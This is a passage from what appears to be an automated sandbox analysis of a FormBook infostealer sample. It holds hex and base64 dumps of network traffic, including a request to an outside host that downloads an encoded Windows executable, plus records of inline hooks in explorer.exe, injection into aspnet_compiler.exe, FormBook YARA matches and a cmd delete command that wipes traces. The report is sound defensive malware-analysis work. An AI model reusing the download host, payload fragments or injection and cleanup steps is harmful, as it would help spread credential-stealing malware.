8i92kuEmGmY//Tv7QvH+0skU79wpws5iEMap3ZMOsaK6QV0untD4Up4WxsjuGY9O5RcuroOWfFXfgOAgexenpM/PV3qz8xou45EThf02kyydCI5oWnJj56sRnI+5vA6wUGH+4PK3GZ3gIc63Go6QTBwJWl+YjKEtwI0tKNFX2SdVF0m9zmoSjs2Dkg9JHoAaVOTd53vgOwrYXWbS5S3bH00zxcCBbpRjRX2C7VzdV6FecVmr1v3bPtp7OUA3uUK
2022-11-03 11:39:58 UTC	195	IN	Data Raw: 6c 74 50 4b 73 57 72 4d 67 6f 64 74 47 77 68 6b 50 4d 49 2b 36 32 74 31 51 2f 73 47 46 39 45 32 45 39 45 45 49 51 6e 68 51 56 44 36 50 45 6c 69 43 46 69 38 70 54 33 79 6e 62 74 38 75 32 6a 62 77 30 55 56 70 30 74 70 48 32 4b 39 4e 68 49 36 55 45 59 7a 4e 33 69 43 66 73 31 4c 4d 48 71 52 51 71 6b 38 4d 57 36 48 49 69 61 73 48 4a 77 45 30 55 39 62 64 68 6a 4b 51 49 70 66 52 46 71 45 65 32 66 36 6f 30 67 62 43 4e 70 4c 77 54 66 4e 74 75 73 6c 72 49 4d 52 6b 45 32 4c 52 7a 44 53 45 46 76 61 53 38 65 56 44 79 6d 48 55 68 6f 67 39 70 79 30 63 65 75 41 69 7a 34 4d 71 61 35 32 53 6d 4c 46 32 6a 54 46 6d 63 43 6a 66 79 41 51 49 68 78 4c 7a 6b 43 79 2b 30 31 42 4e 4b 32 57 39 64 41 72 54 6c 54 58 75 6f 79 36 56 6b 63 4c 2f 73 75 44 64 4d 72 72 74 56 68 33 2f 6b 43 Data Ascii: ltPKsWrMgodtGwhkPMI+62t1Q/sGF9E2E9EEIQnhQVD6PEliCFi8pT3ynbt8u2jbw0UVp0tpH2K9NhI6UEYzN3iCfs1LMHqRQqk8MW6HIiasHJwE0U9bdhjKQIpfRFqEe2f6o0gbCNpLwTfNtuslrIMRkE2LRzDSEFvaS8eVDymHUhog9py0ceuAiz4Mqa52SmLF2jTFmcCjfyAQIhxLzkCy+01BNK2W9dArTlTXuoy6VkcL/suDdMrrtVh3/kC
2022-11-03 11:39:58 UTC	203	IN	Data Raw: 69 4a 34 54 75 6b 79 45 38 34 6f 68 73 61 59 6d 71 33 63 31 36 63 32 4c 73 61 69 4e 37 34 36 54 78 49 33 61 46 74 2f 47 67 63 32 39 64 46 72 70 73 30 4f 5a 36 77 4c 67 4e 32 79 4f 75 57 49 4d 45 76 63 48 55 66 55 4c 54 2b 2f 51 53 6f 69 51 44 66 64 33 2f 57 35 57 6e 61 64 6a 2f 65 69 6c 57 31 37 57 71 43 4a 6e 33 4e 66 2b 47 54 71 44 70 69 4a 4f 58 66 63 55 52 6c 31 41 78 49 53 4e 59 58 35 78 35 47 43 79 4d 79 4e 51 74 71 63 35 4b 2f 46 4d 54 7a 44 43 58 57 63 67 31 79 39 6f 49 44 68 66 63 6f 35 48 6b 37 72 44 67 6c 47 34 4a 57 34 52 30 51 2f 37 57 32 69 55 4f 65 58 39 4f 35 41 76 69 4f 66 2f 54 68 4d 4f 68 61 44 75 67 55 39 39 6e 70 34 56 2b 46 65 48 50 64 4f 78 49 78 71 4d 59 4e 41 74 54 79 4e 63 52 48 6c 57 52 58 4f 34 70 43 30 51 54 71 53 35 47 51 4b Data Ascii: iJ4TukyE84ohsaYmq3c16c2LsaiN746TxI3aFt/Ggc29dFrps0OZ6wLgN2yOuWIMEvcHUfULT+/QSoiQDfd3/W5Wnadj/eilW17WqCJn3Nf+GTqDpiJOXfcURl1AxISNYX5x5GCyMyNQtqc5K/FMTzDCXWcg1y9oIDhfco5Hk7rDglG4JW4R0Q/7W2iUOeX9O5AviOf/ThMOhaDugU99np4V+FeHPdOxIxqMYNAtTyNcRHlWRXO4pC0QTqS5GQK
2022-11-03 11:39:58 UTC	211	IN	Data Raw: 37 69 6e 6c 55 63 56 4e 68 53 49 30 79 74 68 46 31 6e 58 4e 58 69 64 63 74 72 51 74 52 39 61 34 68 4b 67 51 41 56 6f 57 56 57 36 47 46 4f 57 33 39 6a 47 54 47 49 52 56 68 30 69 32 48 45 32 4f 79 6d 69 79 62 75 46 65 49 74 34 2f 56 2b 7a 54 4b 56 4e 57 71 68 2f 7a 6f 4c 65 55 50 58 47 5a 70 67 65 6e 77 38 6d 33 4d 34 72 66 54 48 49 53 73 71 36 4e 53 51 37 42 4c 52 30 6d 62 76 4b 63 79 59 48 62 32 64 48 46 6d 4e 5a 68 44 74 39 7a 33 61 41 4b 51 69 77 4a 38 65 67 57 7a 70 46 2f 32 32 4f 4f 61 53 30 64 6f 70 55 71 79 58 57 79 38 4b 47 55 36 34 59 52 66 6d 58 71 6a 45 4d 6b 68 68 51 59 4f 46 68 4b 59 4c 47 65 53 56 6c 76 4f 75 78 75 52 33 61 46 48 6f 75 5a 61 37 43 70 36 67 55 52 42 39 67 51 73 57 30 41 4c 56 36 44 30 50 4a 6f 69 4a 66 70 67 57 5a 32 30 73 4d Data Ascii: 7inlUcVNhSI0ythF1nXNXidctrQtR9a4hKgQAVoWVW6GFOW39jGTGIRVh0i2HE2OymiybuFeIt4/V+zTKVNWqh/zoLeUPXGZpgenw8m3M4rfTHISsq6NSQ7BLR0mbvKcyYHb2dHFmNZhDt9z3aAKQiwJ8egWzpF/22OOaS0dopUqyXWy8KGU64YRfmXqjEMkhhQYOFhKYLGeSVlvOuxuR3aFHouZa7Cp6gURB9gQsW0ALV6D0PJoiJfpgWZ20sM
2022-11-03 11:39:58 UTC	219	IN	Data Raw: 75 73 43 55 48 34 6b 4d 57 42 77 77 39 5a 77 47 33 2f 4b 45 39 6d 74 64 74 51 76 64 52 54 70 79 55 69 38 32 37 77 6c 6a 77 6a 58 2b 36 64 44 65 46 49 36 7a 63 53 33 74 65 6b 66 68 2b 59 34 71 33 42 46 56 41 50 59 55 79 4b 50 47 55 59 6d 42 32 7a 31 70 74 4f 78 54 64 68 58 4b 70 35 73 6d 6a 30 45 6e 65 67 78 41 6c 34 67 37 6d 47 62 33 34 6c 70 52 76 46 53 53 35 2b 68 73 4b 50 4b 67 76 36 74 64 66 72 64 6f 38 68 57 43 73 34 2b 76 64 45 56 2b 59 34 79 75 47 55 4d 61 66 78 57 73 50 34 6c 50 64 56 6f 76 79 54 47 39 4e 62 66 30 50 38 57 44 50 69 7a 77 4f 39 34 42 78 44 37 64 4a 73 56 43 71 58 30 42 64 45 79 72 41 48 41 34 34 61 78 79 65 6a 6f 71 39 79 6a 48 35 46 36 43 6f 72 36 35 45 72 33 4b 70 50 43 59 31 39 52 68 43 73 74 43 42 4e 39 46 45 67 65 42 2f 2f 73 Data Ascii: usCUH4kMWBww9ZwG3/KE9mtdtQvdRTpyUi827wljwjX+6dDeFI6zcS3tekfh+Y4q3BFVAPYUyKPGUYmB2z1ptOxTdhXKp5smj0EnegxAl4g7mGb34lpRvFSS5+hsKPKgv6tdfrdo8hWCs4+vdEV+Y4yuGUMafxWsP4lPdVovyTG9Nbf0P8WDPizwO94BxD7dJsVCqX0BdEyrAHA44axyejoq9yjH5F6Cor65Er3KpPCY19RhCstCBN9FEgeB//s
2022-11-03 11:39:58 UTC	226	IN	Data Raw: 42 75 49 6c 4d 78 62 48 6f 39 7a 58 30 34 32 2f 4a 68 71 73 6b 51 73 4e 41 2b 59 38 6f 69 2b 36 6a 52 77 69 75 5a 46 47 46 4c 74 2f 41 35 30 37 65 49 67 4c 44 79 48 33 5a 64 73 70 41 61 58 41 38 50 37 38 6e 47 55 45 4f 4d 77 7a 47 64 77 6a 2b 73 4c 68 7a 47 61 51 74 2b 61 4b 6e 32 58 61 31 4f 73 50 39 38 4d 32 56 31 34 69 4e 44 76 4b 50 33 61 6f 53 47 38 42 51 75 6f 4d 30 43 78 2f 43 62 30 6c 6c 4d 78 33 67 52 37 4e 76 73 4a 55 61 32 56 41 65 43 68 61 46 71 69 69 31 5a 6c 31 41 73 71 43 39 45 4d 38 45 68 4e 69 33 32 71 76 4d 69 31 2f 32 5a 5a 32 43 4d 73 64 44 44 45 6e 51 72 6d 34 30 44 49 73 4d 50 43 6d 4c 64 66 74 2f 37 4a 5a 38 71 43 6f 34 4a 4b 47 46 4f 4c 67 66 30 54 76 46 72 4c 6e 54 55 68 74 49 64 30 72 4a 66 78 56 58 2f 4c 63 4f 31 71 4e 77 55 4a Data Ascii: BuIlMxbHo9zX042/JhqskQsNA+Y8oi+6jRwiuZFGFLt/A507eIgLDyH3ZdspAaXA8P78nGUEOMwzGdwj+sLhzGaQt+aKn2Xa1OsP98M2V14iNDvKP3aoSG8BQuoM0Cx/Cb0llMx3gR7NvsJUa2VAeChaFqii1Zl1AsqC9EM8EhNi32qvMi1/2ZZ2CMsdDDEnQrm40DIsMPCmLdft/7JZ8qCo4JKGFOLgf0TvFrLnTUhtId0rJfxVX/LcO1qNwUJ
2022-11-03 11:39:58 UTC	234	IN	Data Raw: 48 46 47 45 2b 35 68 59 63 70 41 67 4c 78 68 51 46 4b 45 61 33 45 56 4a 59 49 35 33 34 46 72 50 37 33 4f 72 57 7a 6b 58 5a 33 56 4d 44 43 42 79 75 6f 6d 44 63 66 58 77 41 73 70 62 4d 45 36 62 35 66 6d 32 31 31 72 5a 61 72 71 59 6f 59 55 68 52 45 6a 47 33 77 47 54 5a 4b 63 4e 45 76 64 52 2f 43 76 31 45 72 65 61 39 53 61 42 61 47 6f 50 6a 78 4d 41 35 45 62 45 6c 4c 74 70 48 68 7a 57 67 67 6f 37 75 56 6f 6c 36 75 35 42 2b 45 71 42 55 6c 33 79 30 49 47 52 34 58 38 31 44 57 59 58 77 63 5a 44 48 31 68 37 51 51 6b 50 73 51 32 70 68 36 46 6c 72 34 33 44 73 52 67 6d 79 47 66 51 6a 72 71 72 4a 4d 4a 61 51 56 76 6e 65 6a 2b 4d 64 30 55 30 54 74 64 4f 65 37 65 65 31 64 53 68 36 45 6d 70 4d 49 4c 47 78 54 53 71 6e 75 56 79 65 39 37 79 63 4f 31 38 57 5a 65 73 62 35 36 Data Ascii: HFGE+5hYcpAgLxhQFKEa3EVJYI534FrP73OrWzkXZ3VMDCByuomDcfXwAspbME6b5fm211rZarqYoYUhREjG3wGTZKcNEvdR/Cv1Erea9SaBaGoPjxMA5EbElLtpHhzWggo7uVol6u5B+EqBUl3y0IGR4X81DWYXwcZDH1h7QQkPsQ2ph6Flr43DsRgmyGfQjrqrJMJaQVvnej+Md0U0TtdOe7ee1dSh6EmpMILGxTSqnuVye97ycO18WZesb56
2022-11-03 11:39:58 UTC	242	IN	Data Raw: 48 39 38 6f 4b 47 39 4b 4f 4b 6b 63 38 6a 6c 71 4a 65 79 67 76 6f 30 68 4a 69 68 77 6a 4d 4d 73 4a 52 6c 2f 64 42 57 78 6a 7a 65 6c 5a 4c 67 47 72 6a 34 5a 44 72 36 52 36 2b 63 72 2f 31 59 4f 35 4b 38 4e 4b 5a 41 62 32 4a 6f 75 35 75 72 47 69 44 4d 73 49 42 63 64 30 33 62 48 4b 57 41 37 51 6e 2f 31 73 59 43 33 52 4a 69 73 47 6d 45 67 63 54 61 6b 52 4a 2f 2b 7a 37 71 46 37 63 66 42 4f 70 48 46 67 35 53 67 48 75 53 53 49 45 68 47 58 36 48 7a 7a 65 53 69 33 76 42 45 64 38 62 49 6d 67 33 69 72 33 7a 45 55 70 2f 45 74 69 33 6f 2b 4e 76 66 4c 44 63 33 77 31 70 6c 49 61 38 36 74 5a 73 73 73 57 78 4c 59 34 4e 77 6b 54 33 67 54 69 57 66 74 63 51 38 6f 73 50 46 53 30 52 39 53 54 53 6c 77 78 6b 53 47 46 79 35 78 63 68 33 41 42 56 66 56 75 53 56 4d 32 51 6e 33 47 43 Data Ascii: H98oKG9KOKkc8jlqJeygvo0hJihwjMMsJRl/dBWxjzelZLgGrj4ZDr6R6+cr/1YO5K8NKZAb2Jou5urGiDMsIBcd03bHKWA7Qn/1sYC3RJisGmEgcTakRJ/+z7qF7cfBOpHFg5SgHuSSIEhGX6HzzeSi3vBEd8bImg3ir3zEUp/Eti3o+NvfLDc3w1plIa86tZsssWxLY4NwkT3gTiWftcQ8osPFS0R9STSlwxkSGFy5xch3ABVfVuSVM2Qn3GC

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49704	50.115.174.192	443	C:\Users\user\Desktop\U8RYIwIvfK.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-03 11:39:59 UTC	246	OUT	GET /tt/BLACKDEV.txt HTTP/1.1 Host: tgc8x.tk
2022-11-03 11:39:59 UTC	246	IN	HTTP/1.1 200 OK Date: Thu, 03 Nov 2022 11:39:58 GMT Server: Apache Last-Modified: Thu, 03 Nov 2022 05:18:41 GMT Accept-Ranges: bytes Content-Length: 27992 Connection: close Content-Type: text/plain
2022-11-03 11:39:59 UTC	247	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 50 68 4e 59 32 4d 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 6f 41 41 41 42 4f 41 41 41 41 41 41 41 41 49 6d 67 41 41 41 41 67 41 41 41 41 67 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPhNY2MAAAAAAAAAAOAADiELATAAAEoAAABOAAAAAAAAImgAAAAgAAAAgAAAAABAAAAgAAAAAgA
2022-11-03 11:39:59 UTC	254	IN	Data Raw: 53 50 2f 48 72 6d 43 64 72 6a 61 31 52 37 2f 54 7a 67 48 48 2b 6e 53 37 62 71 56 4a 63 44 76 63 54 6a 2f 6c 6c 4c 4d 74 75 68 66 46 64 51 38 42 32 39 4e 64 32 4f 71 69 68 69 36 72 79 51 7a 56 36 43 6f 33 7a 32 6c 64 5a 30 38 6f 69 4d 39 65 48 41 39 53 2f 58 5a 46 45 79 30 66 2b 41 72 58 75 51 44 33 4b 6e 58 7a 62 38 37 4e 47 4e 69 39 46 73 44 79 62 50 71 65 5a 34 31 70 4d 34 39 34 4c 72 49 4b 75 41 38 49 6f 73 4a 51 68 39 32 49 50 32 58 34 4a 73 4d 2f 4d 50 77 37 77 79 71 4f 34 75 30 4d 4f 78 68 75 59 70 68 6c 4f 4d 49 64 35 43 72 67 42 4d 4e 7a 48 4e 67 71 59 4c 47 4e 59 72 4f 4e 57 76 59 67 55 76 4c 62 63 74 37 76 67 58 62 62 42 50 67 5a 31 6a 4a 63 79 44 44 45 63 42 6e 44 6a 51 79 48 45 4f 64 79 4f 31 67 2f 77 46 42 47 6a 48 41 50 49 68 71 63 48 64 5a Data Ascii: SP/HrmCdrja1R7/TzgHH+nS7bqVJcDvcTj/llLMtuhfFdQ8B29Nd2Oqihi6ryQzV6Co3z2ldZ08oiM9eHA9S/XZFEy0f+ArXuQD3KnXzb87NGNi9FsDybPqeZ41pM494LrIKuA8IosJQh92IP2X4JsM/MPw7wyqO4u0MOxhuYphlOMId5CrgBMNzHNgqYLGNYrONWvYgUvLbct7vgXbbBPgZ1jJcyDDEcBnDjQyHEOdyO1g/wFBGjHAPIhqcHdZ
2022-11-03 11:39:59 UTC	262	IN	Data Raw: 61 57 52 6c 63 67 42 54 65 58 4e 30 5a 57 30 75 55 32 56 6a 64 58 4a 70 64 48 6b 75 51 33 4a 35 63 48 52 76 5a 33 4a 68 63 47 68 35 41 45 6c 44 63 6e 6c 77 64 47 39 55 63 6d 46 75 63 32 5a 76 63 6d 30 41 55 33 6c 74 62 57 56 30 63 6d 6c 6a 51 57 78 6e 62 33 4a 70 64 47 68 74 41 46 4e 31 63 48 42 79 5a 58 4e 7a 56 57 35 74 59 57 35 68 5a 32 56 6b 51 32 39 6b 5a 56 4e 6c 59 33 56 79 61 58 52 35 51 58 52 30 63 6d 6c 69 64 58 52 6c 41 46 4e 35 63 33 52 6c 62 53 35 54 5a 57 4e 31 63 6d 6c 30 65 51 42 54 61 57 35 6e 62 47 55 41 55 33 52 79 61 57 35 6e 41 45 56 75 59 32 39 6b 61 57 35 6e 41 46 4e 35 63 33 52 6c 62 53 35 55 5a 58 68 30 41 45 31 76 62 6d 6c 30 62 33 49 41 55 33 6c 7a 64 47 56 74 4c 6c 52 6f 63 6d 56 68 5a 47 6c 75 5a 77 42 55 65 58 42 6c 41 46 56 Data Ascii: aWRlcgBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5AElDcnlwdG9UcmFuc2Zvcm0AU3ltbWV0cmljQWxnb3JpdGhtAFN1cHByZXNzVW5tYW5hZ2VkQ29kZVNlY3VyaXR5QXR0cmlidXRlAFN5c3RlbS5TZWN1cml0eQBTaW5nbGUAU3RyaW5nAEVuY29kaW5nAFN5c3RlbS5UZXh0AE1vbml0b3IAU3lzdGVtLlRocmVhZGluZwBUeXBlAFV
2022-11-03 11:39:59 UTC	270	IN	Data Raw: 41 41 41 58 41 51 41 53 51 32 39 77 65 58 4a 70 5a 32 68 30 49 4d 4b 70 49 43 41 79 4d 44 49 79 41 41 41 45 49 41 45 42 41 69 6b 42 41 43 51 33 5a 44 64 68 4e 54 4d 33 4e 53 30 32 4e 44 4d 31 4c 54 51 35 4d 54 6b 74 59 6a 4e 6c 4e 69 31 69 4f 44 52 6c 4d 7a 41 7a 4e 32 52 6c 4e 7a 55 41 41 41 77 42 41 41 63 78 4c 6a 41 75 4d 43 34 77 41 41 42 4a 41 51 41 61 4c 6b 35 46 56 45 5a 79 59 57 31 6c 64 32 39 79 61 79 78 57 5a 58 4a 7a 61 57 39 75 50 58 59 30 4c 6a 55 42 41 46 51 4f 46 45 5a 79 59 57 31 6c 64 32 39 79 61 30 52 70 63 33 42 73 59 58 6c 4f 59 57 31 6c 45 69 35 4f 52 56 51 67 52 6e 4a 68 62 57 56 33 62 33 4a 72 49 44 51 75 4e 51 59 48 42 41 67 43 41 67 49 31 42 79 30 49 44 68 45 67 45 52 77 49 43 42 30 49 43 41 67 49 43 41 49 49 43 41 59 64 42 51 67 Data Ascii: AAAXAQASQ29weXJpZ2h0IMKpICAyMDIyAAAEIAEBAikBACQ3ZDdhNTM3NS02NDM1LTQ5MTktYjNlNi1iODRlMzAzN2RlNzUAAAwBAAcxLjAuMC4wAABJAQAaLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUBAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lEi5ORVQgRnJhbWV3b3JrIDQuNQYHBAgCAgI1By0IDhEgERwICB0ICAgICAIICAYdBQg

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE9
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE9
GetMessageW	INLINE	0x48 0x8B 0xB8 0x85 0x5E 0xE9
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8D 0xDE 0xE9

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: U8RYIwIvfK.exePID: 5840, Parent PID: 3452

General

Target ID:	0
Start time:	12:39:53
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\U8RYIwIvfK.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\U8RYIwIvfK.exe
Imagebase:	0x240000
File size:	74240 bytes
MD5 hash:	6F53598B9C19B30A0CF3FF0432301708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: aspnet_compiler.exePID: 5140, Parent PID: 5840

General

Target ID:	1
Start time:	12:39:59
Start date:	03/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x120000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: aspnet_compiler.exePID: 6124, Parent PID: 5840

General

Target ID:	2
Start time:	12:39:59
Start date:	03/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x3c0000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: aspnet_compiler.exePID: 6120, Parent PID: 5840

General

Target ID:	3
Start time:	12:39:59
Start date:	03/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x6a0000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 6120

General

Target ID:	4
Start time:	12:40:02
Start date:	03/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff647860000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5916, Parent PID: 3452

General

Target ID:	14
Start time:	12:40:44
Start date:	03/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4120, Parent PID: 5916

General

Target ID:	15
Start time:	12:40:49
Start date:	03/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5256, Parent PID: 4120

General

Target ID:	16
Start time:	12:40:49
Start date:	03/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: U8RYIwIvfK.exePID: 5840, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	25.2%
Dynamic/Decrypted Code Coverage:	100%
